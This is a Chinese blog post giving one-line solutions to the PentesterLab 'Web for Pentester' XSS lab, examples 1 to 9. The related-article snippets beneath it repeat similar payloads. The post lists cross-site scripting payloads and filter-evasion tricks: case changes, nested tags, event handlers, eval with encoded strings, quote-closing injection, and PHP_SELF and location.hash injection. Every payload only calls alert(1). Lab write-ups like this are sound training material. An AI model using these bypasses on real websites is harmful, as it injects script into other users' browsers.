Web for Pentester XSS Example 01-09

最新推荐文章于 2023-02-07 19:39:32 发布
最新推荐文章于 2023-02-07 19:39:32 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: Web for Pentester 文章标签: Web XSS Pentest
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/puzi126/article/details/38059781
版权

Ref:https://www.pentesterlab.com/exercises/web_for_pentester/

Dat:20140722


web for pentester是PentesterLib开发的众多渗透测试学习平台之一,通过该平台我们可以了解学习到常见的Web漏洞检测技术。


【Example 01】
无过滤

<script>alert(1)</script>

【Example 02】
大小写替换 

<sCript>alert(1)</scRipt>

【Example 03】
多余属性 
<script/b>alert(1)</script/a>
<sc<script>ript>alert(1)</scr</script>ipt>

【Example 04】
变换标签 
<img οnerrοr=alert(1) src=a>
<a οnmοuseοver=alert(1)>
<div οnmοuseοver=alert(1)>

【Example 05】
EVAL 
<script>eval('a\154ert(1)')</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<script>eval(atob('YWxlcnQoMSk='))</script>

标签变换+进制 
<img οnerrοr=al\u0065rt(1) src=a>

【Example 06】
标签闭合 
";alert(1);"

【Example 07】
标签闭合 
';alert(1);'

【Example 08】
标签form属性利用 
example8.php/" ><script>alert(1)</script><"

【Example 09】
location.hash利用 
example9.php#<script>alert(1)</script>

puzi126
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web for pentesterxss
Merc_A的专栏
11-09 1677
1、很明显了,地址栏里name=hacker。直接name=alert(1)。 2、还是先试一下alert(1),,输出只有alert,script不见了,先换大小写试一下,成功了。。 3、还是先试一下alert(1),发现还是只输出了alert(1),换大小写也没有用,我的和呢,肯定是后台被注释掉了,那就这样pt>alert(1)ript>。 这样他注释掉一个我们还有一个。 4、你会
Web for pentester靶机xss漏洞
Long_gone的博客
10-20 450
Example 1 这关进去以后是个这个页面: 页面显示的 Hello hacker 和url上最后name=后的一样,然后再看一下源码: 在源码的下方找到这个输出的位置,第一关一般都比较简单,不会有太多的过滤,所以先用常用的<script>标签来尝试一下: <script>alert(1)</script> 成功弹出。 Example 2 进来以后和第...
web for pentester XSS部分练习
若为此弦
08-21 3775
example 1 url上改成name=
合天实验室xss试验实例9
我只会装360的博客
08-27 144
实例9 该代码即取#后的内容写入HTML中,直接弹窗即可
初始web for pentester(靶场)之XSS
supreme_lu的博客
03-22 537
昨天由于刚接触web安全,不了解靶场相关知识,加上网站上关于web for pentester有关视频资料少之又少,多数是DVWA的,昨天就初步探究一下DVWA,今天看了下《白帽子讲web安全》这本书,详细了解了xss相关知识。ps:小白还是推荐先看书,不要先看百度相关论坛知识点的帖子和他人相关视频,从书本开始好一点。 example1 首先xss实验example1是一个过滤性能很低反射型xss...
web_for_pentester.pdf
04-02
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。
web_for_pentester镜像文件
08-05
网络安全渗透测试环境镜像文件,直接装在虚拟机上可运行
pentestER-Fully-automatic-scanner:DNS子域●强力●Web蜘蛛●Nmap扫描●等
05-02
#定向全自动化渗透测试###F_A_S_T...批量扫描整个段或者定向地址,加强了修改改进版webprinter -web指纹识别Win下所需程序Nmap -服务、端口、exp精确扫描批处理 -进行监听和执行命令awvs扫描器 -批量扫描web应用---后续
ATTCK-PenTester-Book-master.zip
09-08
ATT&CK 中文手册 一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) ...
Nmap-For-Pentester
05-22
Nmap for Pesterester 该备忘单是专为Red Teamers和渗透测试人员而设计的,以便帮助他们使用“ Nmap”来查找漏洞。 它的设计使初学者可以了解基础知识,而专业人士可以使用高级选项来提高自己的技能。 有多种方法...
Example9_9
xu1314的专栏
10-31 366
 package itat;public class Example9_9 { /**  * @param args  */ public static void main(String[] args) {  // TODO Auto-generated method stub  A1 a=new A1();  a.students.start();  a.teacher.start(
web_for_pentest XSS系列
river
04-29 3374
web_for_pentest   XSS 系列 最近突然想把web捡起来,至少再熟悉一下吧。于是乎在freebuf上找到了这个: http://www.freebuf.com/sectool/8215.html web_for_pentest是一个集成了基础web漏洞的环境,下载iso开虚拟机就完成了环境的搭建,不懂得一搜一大堆。一个项目一个项目来,先是XSS部分(太简单了。。。大神别打我
xss漏洞1-9关
G208_522的博客
11-20 3126
第一关 没有可以输入的表单,直接在url中拼接 <script>alert('xss')</script> 源码展示 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function()
web-for-pentest 笔记
yuhongkui的专栏
12-19 374
XSS Example1 看到Hello hacker,然后url中有name=hacker,换个字符试下,果然,是php获取$_GET[‘name’]的值,然后输出出来,和自己最初学习xss时练习的一样。试下<script>alert('xss')</script>,成功弹窗 Example2 先输入上面的最基本的payload试下,发现被过滤了,那就构造<...
Web For Pentester 阅读笔记(1)
kezhen的专栏
06-06 2921
The Web Web appl ications are probably the most common services exposed by companies and insti tutions on the internet, furthermore, most old appl ications have now a "web version" to be avai lable
Web_for_Pentester_I之文件包含漏洞
贝隆的博客
02-07 354
Web_for_Pentester_I之文件包含漏洞
Web_for_Pentester_I代码执行漏洞
贝隆的博客
02-07 344
Web_for_Pentester_I代码执行漏洞
PentesterLab » Web for Pentester 通关笔记
weixin_44377940的博客
02-08 996
寒假看到一个练习题,很有意思也很适合我这样的新手,于是下载下来练手。 下载地址
Web For Pentester 第八关分析
最新发布
06-07
<title>Web for Pentester <meta charset="UTF-8"> <h1 align="center">Welcome to Web for Pentester <img src="8.jpg" alt="web for pentester"> ``` 从代码中可以看出,这是一个简单的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值